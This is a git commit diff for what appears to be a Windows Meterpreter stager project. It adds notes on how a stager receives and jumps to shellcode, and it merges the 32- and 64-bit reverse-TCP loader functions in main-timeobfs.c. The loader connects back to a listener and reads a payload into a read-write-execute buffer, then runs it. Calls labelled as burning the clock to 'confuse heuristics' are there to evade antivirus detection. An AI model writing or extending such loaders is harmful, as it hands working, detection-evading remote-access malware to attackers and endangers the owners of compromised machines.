Cleanup, and explain what's going on

.gitignore

@@ -1,3 +1,9 @@
+#################
+## Executable
+#################
+.exe
+.o
+
 #################
 ## Eclipse
 #################
@@ -165,4 +171,4 @@ pip-log.txt
 # sublime text project files
 
 *.sublime-project
-*.sublime-workspace
+*.sublime-workspace

custom_meterp_bind.txt

@@ -0,0 +1,21 @@
+* connect to the handler
+* read a 4-byte length
+* allocate a length-byte buffer
+* mark it as writable and executable (on Windows you'll need VirtualProtect for this)
+* read length bytes into that buffer
+* jump to the buffer. easiest way to do this in C is cast it to a function pointer and call it.
+
+via egypt
+
+Assuming x86 arch, you have to make sure that the EDI register contains your socket descriptor (the value of the ConnectSocket variable). You can do this via inline asm, but it might be easier to just prepend the 5 bytes for setting it to your shellcode:
+
+BF 78 56 34 12   mov edi, 0x12345678
+
+For 64 bit, you have to use the RDI register (and need 10 bytes):
+
+48 BF 78 56 34 12 00 00 00 00    mov rdi, 0x12345678
+
+PS: This is the reason why the calling convention within Metasploit is
+called "sockedi"
+
+Via Michael Schierl

main-timeobfs.c

@@ -132,67 +132,23 @@ int sandbox_evasion(){
 
 
 //The metasploit-loader extracted into its own function.
+//Works with 32 or 64 bit meterpreter depending on if ISX64 is defined or not
 void reverse_tcp_meterpreter(char * listenerIP,unsigned int listenerPort){
 	ULONG32 size;
 	char * buffer;
 	void (*function)();
-	winsock_init();
+	#ifndef ISX64
+		//Not 64 bit
+		int movCmdSize = 1;
+		int ptrSize = 4;
+		char movCmd[] = {0xBF};
+	#else
+		//Is 64 bit
+		int movCmdSize = 2;
+		int ptrSize = 8;
+		char movCmd[] = {0x48,0xBF};
+	#endif
 
-	//start the socket homie
-	SOCKET my_socket = wsconnect(listenerIP, listenerPort);
-	//receive 4 bytes which indicates the size of the next payload
-	int count = recv(my_socket, (char *)&size, 4, 0);
-	//check for issues
-	if (count != 4 || size <= 0)
-		Kick(my_socket, "bad length value\n");
-
-	//================================
-	//burn out the clock, and confuse heuristics with some random number generation
-	genlol();
-	//================================	
-
-	//allocate the RWX buffer
-	buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-
-	//================================
-	//burn out the clock, and confuse heuristics with some random number generation
-	genlol();
-	//================================
-
-	//check the buffer for issues
-	if (buffer == NULL)
-		Kick(my_socket, "bad buffer\n");
-	//puts mov on to the front of the buffer
-	buffer[0] = 0xBF;
-
-	//================================
-	//burn out the clock, and confuse heuristics with some random number generation	
-	genlol();
-	//================================
-
-	//copies the socket pointer onto the buffer after 0xBF
-	//see this post for more infor http://mail.metasploit.com/pipermail/framework/2012-September/008664.html
-	memcpy(buffer + 1, &my_socket, 4);
-
-	//================================
-	//burn out the clock, and confuse heuristics with some random number generation
-	genlol();
-	//================================
-
-	//receives the rest of the data from the socket (based on the size received before)
-	count = recv_all(my_socket, buffer + 5, size);
-	//cast the buffer as a function?
-	function = (void (*)())buffer;
-	//execute dat meterpreter
-	function();
-}
-
-
-//The metasploit-loader for 64 bit systems
-void reverse_tcp_meterpreter_x64(char * listenerIP,unsigned int listenerPort){
-	ULONG32 size;
-	char * buffer;
-	void (*function)();
 	winsock_init();
 
 	//start the socket homie
@@ -209,7 +165,7 @@ void reverse_tcp_meterpreter_x64(char * listenerIP,unsigned int listenerPort){
 	//================================	
 
 	//allocate the RWX buffer
-	buffer = VirtualAlloc(0, size + 10, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	buffer = VirtualAlloc(0, size + movCmdSize + ptrSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 
 	//================================
 	//burn out the clock, and confuse heuristics with some random number generation
@@ -220,25 +176,24 @@ void reverse_tcp_meterpreter_x64(char * listenerIP,unsigned int listenerPort){
 	if (buffer == NULL)
 		Kick(my_socket, "bad buffer\n");
 	//puts mov on to the front of the buffer
-	buffer[0] = 0x48;
-	buffer[1] = 0xBF;
+	memcpy(buffer, movCmd, movCmdSize);
 
 	//================================
 	//burn out the clock, and confuse heuristics with some random number generation	
 	genlol();
 	//================================
 
-	//copies the socket pointer onto the buffer after 0x48 0xBF
+	//copies the socket pointer onto the buffer after the move command
 	//see this post for more infor http://mail.metasploit.com/pipermail/framework/2012-September/008664.html
-	memcpy(buffer + 2, &my_socket, 8);
+	memcpy(buffer + movCmdSize, &my_socket, ptrSize);
 
 	//================================
 	//burn out the clock, and confuse heuristics with some random number generation
 	genlol();
 	//================================
 
 	//receives the rest of the data from the socket (based on the size received before)
-	count = recv_all(my_socket, buffer + 10, size);
+	count = recv_all(my_socket, buffer + movCmdSize + ptrSize, size);
 	//cast the buffer as a function?
 	function = (void (*)())buffer;
 	//execute dat meterpreter
@@ -254,17 +209,9 @@ int main(int argc, char *argv[]) {
 
 	//If command line parameters are given, use those instead of defaults.
 	if(argc == 3){
-		#ifdef ISX64
-			reverse_tcp_meterpreter_x64(argv[1], atoi(argv[2]));
-		#else
-			reverse_tcp_meterpreter_x64(argv[1], atoi(argv[2]));
-		#endif
+		reverse_tcp_meterpreter(argv[1], atoi(argv[2]));
 	}else{
-		#ifdef ISX64
-			reverse_tcp_meterpreter_x64(defaultListenerIP, defaultListenerPort);
-		#else
-			reverse_tcp_meterpreter_x64(defaultListenerIP, defaultListenerPort);
-		#endif
+		reverse_tcp_meterpreter(defaultListenerIP, defaultListenerPort);
 	}
 
 	return 0;